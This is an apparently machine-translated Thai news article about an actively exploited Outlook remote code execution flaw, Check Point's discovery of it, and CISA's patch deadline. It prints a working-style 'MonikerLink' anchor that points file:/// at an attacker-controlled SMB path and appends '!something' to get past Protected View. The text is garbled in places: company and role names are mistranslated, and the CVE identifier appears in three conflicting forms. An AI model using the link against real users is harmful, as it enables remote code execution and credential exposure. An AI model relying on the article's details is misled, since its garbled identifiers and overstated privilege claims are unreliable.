จุดตรวจสอบของ บริษัท ไซเบอร์ความปลอดภัยได้ค้นพบช่องโหว่การดำเนินการรหัสระยะไกลที่สำคัญ (RCE) ใน Microsoft Outlook ซึ่งกำลังถูกนำไปใช้ในการโจมตีทางไซเบอร์ที่ใช้งานอยู่ซึ่งเป็นภัยคุกคามที่สำคัญต่อองค์กรทั่วโลก
สิ่งนี้ได้กระตุ้นให้หน่วยงานความมั่นคงด้านความปลอดภัยทางไซเบอร์และโครงสร้างพื้นฐาน (CISA) เตือนหน่วยงานรัฐบาลกลางของสหรัฐอเมริกาเพื่อรักษาความปลอดภัยระบบของพวกเขาจากการโจมตีอย่างต่อเนื่อง
นักวิจัยช่องโหว่จุดตรวจสอบ Haifei Li ค้นพบช่องโหว่ RCE ที่มีความรุนแรงมากCVE-20124–21413(คะแนน CVSS 9.8)
ข้อบกพร่องนี้เป็นผลมาจากการตรวจสอบอินพุตที่ไม่เหมาะสมซึ่งสามารถเรียกใช้การดำเนินการรหัสเมื่อเปิดอีเมลด้วยลิงก์ที่เป็นอันตรายโดยใช้เวอร์ชัน Microsoft Outlook ที่มีช่องโหว่
การเอารัดเอาเปรียบที่ประสบความสำเร็จของช่องโหว่นี้จะช่วยให้นักแสดงภัยคุกคามสามารถข้ามมุมมองที่ได้รับการป้องกันสำนักงานและเปิดไฟล์ที่เป็นอันตรายในโหมดการแก้ไขแทนที่จะเป็นโหมดที่ได้รับการป้องกัน
นอกจากนี้ยังสามารถให้สิทธิพิเศษของนักแสดงภัยคุกคามที่สูงขึ้นรวมถึงความสามารถในการอ่านเขียนและลบข้อมูล
Microsoft กล่าวถึงช่องโหว่ CVE-2014–21413 เมื่อปีที่แล้วโดยเตือนว่าบานหน้าต่างตัวอย่างอาจเป็นเวกเตอร์การโจมตี
เป็นผลให้เพียงแค่ดูอีเมลที่เป็นอันตรายภายใน Outlook อาจเพียงพอที่จะกระตุ้นการหาประโยชน์ทำให้มันอันตรายเป็นพิเศษ
ตามจุดตรวจสอบผู้โจมตีใช้ประโยชน์จากช่องโหว่ที่ขนานนามชื่อเล่นลิงค์ซึ่งเป็นวิธีการที่หลอกให้เกิดการเปิดไฟล์ที่ไม่ปลอดภัย
สิ่งนี้ช่วยให้นักแสดงภัยคุกคามสามารถข้ามการป้องกัน Outlook ในตัวสำหรับลิงก์ที่เป็นอันตรายที่ฝังอยู่ในอีเมลโดยใช้ไฟล์: // โปรโตคอล
ผู้โจมตีสามารถจัดการกับแนวโน้มในการปฏิบัติต่อไฟล์ที่เป็นอันตรายเป็นทรัพยากรที่เชื่อถือได้โดยการเพิ่มเครื่องหมายอัศเจรีย์ตามด้วยข้อความโดยพลการกับ URL ไฟล์
โดยการแทรกเครื่องหมายอัศเจรีย์นี้ทันทีหลังจากการขยายไฟล์ใน URL ที่ชี้ไปที่เซิร์ฟเวอร์ที่ควบคุมโดยผู้โจมตีพร้อมกับข้อความแบบสุ่มพวกเขาสามารถหลอกลวงระบบและดำเนินการ payloads ที่เป็นอันตรายได้
ตัวอย่างเช่นผู้โจมตีอาจสร้างลิงค์ดังที่แสดงด้านล่าง:
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>คลิกฉัน</a>
เมื่อเหยื่อคลิกที่ลิงค์ Outlook จะดึงไฟล์จากเซิร์ฟเวอร์ของผู้โจมตีและเรียกใช้ด้วยสิทธิ์ที่สูงขึ้นทำให้ผู้โจมตีควบคุมระบบ
ช่องโหว่ CVE-2024-21413 ส่งผลกระทบต่อผลิตภัณฑ์ Microsoft Office หลายรายการรวมถึง Microsoft Office LTSC 2021, แอพ Microsoft 365 สำหรับ Enterprise, Microsoft Outlook 2016 และ Microsoft Office 2019
ในการตอบสนองต่อการใช้ประโยชน์จากช่องโหว่นี้ CISA ได้เพิ่ม CVE-2014-21413 ลงในแคตตาล็อกช่องโหว่ที่เป็นที่รู้จัก (KEV)
ตามคำสั่งการดำเนินงานที่มีผลผูกพันในเดือนพฤศจิกายน 2564 (BOD) 22-01 หน่วยงานของรัฐบาลกลางได้รับเวลาจนถึงวันที่ 27 กุมภาพันธ์ 2568 เพื่อแก้ไขระบบของพวกเขาและปกป้องเครือข่ายของพวกเขาจากภัยคุกคามที่อาจเกิดขึ้น
“ ช่องโหว่ประเภทนี้เป็นเวกเตอร์โจมตีบ่อยครั้งสำหรับนักแสดงไซเบอร์ที่เป็นอันตรายและมีความเสี่ยงที่สำคัญต่อองค์กรของรัฐบาลกลาง” สำนักงานความปลอดภัยทางไซเบอร์เตือนในวันพฤหัสบดี
ด้วยการเอารัดเอาเปรียบที่ใช้งานอยู่ในป่า CVE-2014-21413 นำเสนอความเสี่ยงด้านความปลอดภัยที่รุนแรงต่อผู้ใช้
ดังนั้นองค์กรเอกชนควรใช้แพทช์ทันทีและเสริมสร้างการป้องกันความปลอดภัยทางไซเบอร์เพื่อป้องกันการละเมิดที่อาจเกิดขึ้น
